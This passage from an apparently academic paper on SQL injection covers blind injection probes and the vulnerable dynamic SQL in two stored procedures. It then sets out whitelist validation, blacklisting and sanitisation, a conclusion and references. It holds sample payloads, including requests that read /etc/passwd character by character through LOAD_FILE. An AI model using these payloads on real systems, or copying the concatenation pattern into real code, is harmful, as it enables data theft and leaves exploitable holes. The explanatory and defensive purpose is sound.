The answer will be false, and this response serves as the reference: a test whose response is identical to it has returned false, any other response is taken as true. The end of the iteration procedure is a critical parameter to be defined. In case we obtain two subsequent 0 outputs of the ASCII function, this means that nothing is returned from the function (the case of a character with value 0 is excluded by running the function twice): a SUBSTRING beyond the end of the text returns the empty string, whose ASCII value is 0 (null). In order to understand when we have ended we therefore use this characteristic of the SUBSTRING function together with the LENGTH function. When our test returns a true value for an ASCII code equal to 0, either we have effectively finished analysing the characters of the username, or the field contains the value null. If i is the number of characters found so far, the query becomes:

    $Id=1' AND LENGTH(username)=i AND '1' = '1

where i is the number of characters analysed so far. The SQL will look like this:

    SELECT name, address, tel FROM Users WHERE Id='1' AND LENGTH(username)=i AND '1' = '1'

which is true or false depending on whether the complete length of the username has been inserted in variable i. If not, another iteration is needed. This kind of SQL injection attack requires a large number of queries, meaning that if the amount of requests possible per user could be limited, such attacks would be more difficult to implement. It also means that automated tools are needed for detection of, and protection against, these attacks.

[Figure: screenshot of a blind SQL injection tool [12]. Fields shown: Url: http://www.example.com/index.php?id=2; Query: INJECTION AND '1' = '1; Query Identifier: QUERY; Injection Identifier: INJECTION; File to dump: /etc/passwd; Try character. The request log shows successive attempts of the form ...ASCII(SUBSTRING(LOAD_FILE('/etc/passwd'),4,1))=110 AND '1' = '1, ...=111 ..., ...=112 ..., ...=113 ..., i.e. the fourth character of the file being tested against increasing ASCII values.]

5.7 Stored Procedure Injection

Stored procedures are thought to be the solution to SQL injection attacks, though this is not true. Dynamic SQL within stored procedures is also vulnerable to SQL injection attacks. If the input of stored procedures is not properly sanitised then SQL injection attacks can be easily implemented. When using dynamic SQL within a stored procedure, the application must properly sanitise the user input to eliminate the risk of code injection. If not sanitised, the user could enter malicious SQL that will be executed within the stored procedure. For example, a vulnerable stored procedure:

    Create procedure user_login @field1 varchar(20), @field2 varchar(20)
    As
    Declare @sqlstring varchar(250)
    Set @sqlstring = 'Select 1 from users Where field1 = ' + @field1 + ' and field2 = ' + @field2
    exec(@sqlstring)
    Go

In this stored procedure the input is not sanitised and the result will be affected accordingly: the values are concatenated into the statement text without even being quoted, so whatever is passed in @field1 or @field2 is executed as SQL. The concatenation itself is the defect; in SQL Server, caller-supplied values belong in parameters passed to sp_executesql rather than in the string, or the dynamic SQL should be avoided altogether. The same is valid for the following procedure too:

    Create procedure get_report @field1 varchar(7900)
    As
    Declare @sqlstring varchar(8000)
    Set @sqlstring = 'Select ' + @field1 + ' from fieldTable'
    exec(@sqlstring)
    Go

5.8 Data Validation Strategies

There are four strategies for validating data (32), and they should be used in this order (the first three are described below):

5.8.1 Accept known good

This strategy is also known as positive validation, meaning that if the input value is not contained in the "whitelist" of known values it should be rejected. In order for this rule to work, values shall always:
• have no typing errors
• have their length checked
• have their format and type checked, if the value is numeric
• be checked for syntax errors before validation for the first time.

If a plate number is expected, then validation of the plate number (type, length and syntax) shall be performed:

    import java.util.regex.Pattern;

    public class ValidationEngine {
        // Returns the value unchanged when it matches the whitelist pattern,
        // and an empty string (meaning "rejected") otherwise.
        public String isPlaten(String platen) {
            return (platen != null
                    && Pattern.matches("^(((2|8|9)\\d{2})|((02|08|09)\\d{2})|([1-9]\\d{3}))$", platen))
                   ? platen : "";
        }
    }

Coding should make visible possible input from untrusted sources, as in the example below:

    String taintPlaten = request.getParameter("platen");
    ValidationEngine validator = new ValidationEngine();
    String validPlaten = validator.isPlaten(taintPlaten);   // "" means the value was rejected

5.8.2 Reject known bad

This strategy, also known as "negative" validation, is less efficient than positive validation, as the combinations are infinite and it can only rely on patterns, e.g. suspicious characters are to be rejected. Of course, like all techniques of this kind, the patterns (or known-bad) database shall be updated on a regular basis.

5.8.3 Sanitize

Like any other pattern-like technique, sanitisation of specific characters needs to be updated often to maintain its effectiveness. Moreover, such approaches usually lead to incomplete protection, as something is always missing.

6 CONCLUSION

To avoid SQL injection attacks, sanitisation and data input validation shall be performed in both the database part and the web interface application. Methods such as stored procedures, which used to be enough for database security some time ago, are no longer enough. Security, in an application embedded or not, shall be treated in the whole network and not specifically in a database. Special care shall be applied to the execution of programs that find their way into the network through the input fields; this is a great danger and for that reason all networking security countermeasures, e.g. antivirus, firewalls, correct network topology, NAT etc., have to be applied. In any case the database part of an application is deep inside the network. Threats shall not be allowed to reach the database. The defence line shall be the network, with the caveat that an injection payload travels inside an otherwise legitimate request that network controls do not inspect, so the application-level validation described above remains the primary defence. Extra care shall be applied to the interfaces at a far higher level, between the database and the application part.
Intruders can manipulate those interfaces too. And of course a frequent update of all the pattern-based tools (SQL injection vulnerability detectors, antivirus, firewalls, sanitisation tools etc.) shall be performed on a regular basis in maintenance windows, just like any other regular maintenance procedure. The general security principle "accept known good, reject known bad, sanitize" shall be followed in any case.

7 REFERENCES

[1] Jody Melbourne and David Jorm, Penetration Testing for Web Applications (Part Two), http://www.securityfocus.com/infocus/1709, 2003-07-03, accessed 03/08
[2] Jody Melbourne and David Jorm, Penetration Testing for Web Applications (Part One), http://www.securityfocus.com/infocus/1704, 2003-07-03, accessed 03/08
[3] http://www.sqlsecurity.com, accessed 03/2008
[4] SQL Server related articles, http://www.sql-server-performance.com/, accessed 03/08
[5] Chris Anley (chris@ngssoftware.com), Advanced SQL Injection in SQL Server Applications, http://www.nextgenss.com/papers/advanced_sql_injection.pdf
[6] Kevin Spett, Are your web applications vulnerable?, http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf, accessed 03/08
[7] http://technet.microsoft.com/en-us/library/ms161953.aspx, accessed 03/08
[8] http://www.acunetix.com/websitesecurity/sql-injection.htm, accessed 03/08
[9] http://www.acunetix.com/websitesecurity/webapp-security.htm, accessed 03/08
[10] Open Web Application Security Project, Main Page, http://www.owasp.org/index.php/Main_Page, accessed 06/08
[11] Open Web Application Security Project (OWASP), Reviewing Code for SQL Injection, http://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection, accessed 06/08
[12] Open Web Application Security Project (OWASP), Testing for SQL Injection, http://www.owasp.org/index.php/Testing_for_SQL_Injection, accessed 06/08
[13] Open Web Application Security Project (OWASP), Blind SQL Injection, http://www.owasp.org/index.php/Blind_SQL_Injection, accessed 06/08
[14] Microsoft Corporation, How To: Protect From SQL Injection in ASP.NET, http://msdn.microsoft.com/en-us/library/ms998271.aspx, accessed 06/08
[15] SQL Injection, and why it matters, http://www.attackprevention.com/article/SQL_Injection_and_why_it_matters-1836.html, accessed 06/08
[16] Erland Sommarskog (SQL Server MVP), The Curse and Blessings of Dynamic SQL, http://www.sommarskog.se/dynamic_sql.html#forks, accessed 06/08
[17] Peiter Zatko, Common Exploit Techniques, http://samsclass.net/124/ppt/ch11.doc, accessed 06/08
[18] Web Application Security Consortium, Threat Classification: SQL Injection, http://www.webappsec.org/projects/threat/classes/sql_injection.shtml, accessed 06/08
[19] SQL Injection: Modes of attack, defense, and why it matters, http://www.attackprevention.com/Exploits/SQL_Injection, accessed 06/08
[20] Cesar Cerrudo, Manipulating Microsoft SQL Server Using SQL Injection, www.appsecinc.com, http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf, accessed 06/08
[21] Victor Chapela (Sm4rt Security Services), Advanced SQL Injection, OWASP, http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt#35, accessed 06/08
[22] Kevin Beaver, CISSP, SQL injection tools for automated testing, http://searchsqlserver.techtarget.com/tip/0,289483,sid87_gci1159434,00.html, 16 January 2006, accessed 06/08
[23] Mike Chapple, Testing For SQL Injection Vulnerabilities, About.com, http://databases.about.com/od/security/a/sql_inject_test.htm, accessed 06/08
[24] Elizabeth Fong and Romain Gaucher (NIST), Testing Web Application Scanner Tools, http://rgaucher.info/work/NIST/Verify07_Slides_Fong-Gaucher.pdf, accessed 06/08
[25] William G.J. Halfond and Alessandro Orso, AMNESIA: Analysis and Monitoring for NEutralizing SQL-Injection Attacks, College of Computing, Georgia Institute of Technology, http://www.cc.gatech.edu/~whalfond/papers/halfond05ase.pdf, accessed 06/08
[26] The HP Security Laboratory, http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2008/06/24/finding-sql-injection-with-scrawlr.aspx, published 24 June 2008, accessed 06/08
[27] OWASP, WebGoat Project, http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project, accessed 06/08
[28] OWASP, Cross Site Scripting, http://www.owasp.org/index.php/Cross_Site_Scripting, accessed 06/08
[29] David Zimmer, Real World XSS, http://sandsprite.com/Sleuth/papers/RealWorld_XSS_2.html, accessed 06/08
[30] Alex Eliot, Sanitisation and Validation in PHP, ZYMIC Webmaster resources, http://www.zymic.com/tutorials/php/sanitisation-and-validation-in-php/, accessed 06/08
[31] William G.J. Halfond and Alessandro Orso, AMNESIA: Analysis and Monitoring for NEutralizing SQL-Injection Attacks, College of Computing, Georgia Institute of Technology, http://www.cc.gatech.edu/~whalfond/papers/halfond05ase.pdf, accessed 06/08
[32] OWASP, Data Validation, http://www.owasp.org/index.php/Data_Validation, accessed 06/08
[33] Dan Goodin in San Francisco, Microsoft and HP tackle SQL-injection scourge (modest proposal), The Register, http://www.theregister.co.uk/2008/06/26/microsoft_hp_sql_injection_tools/, published Thursday 26 June 2008, accessed 06/08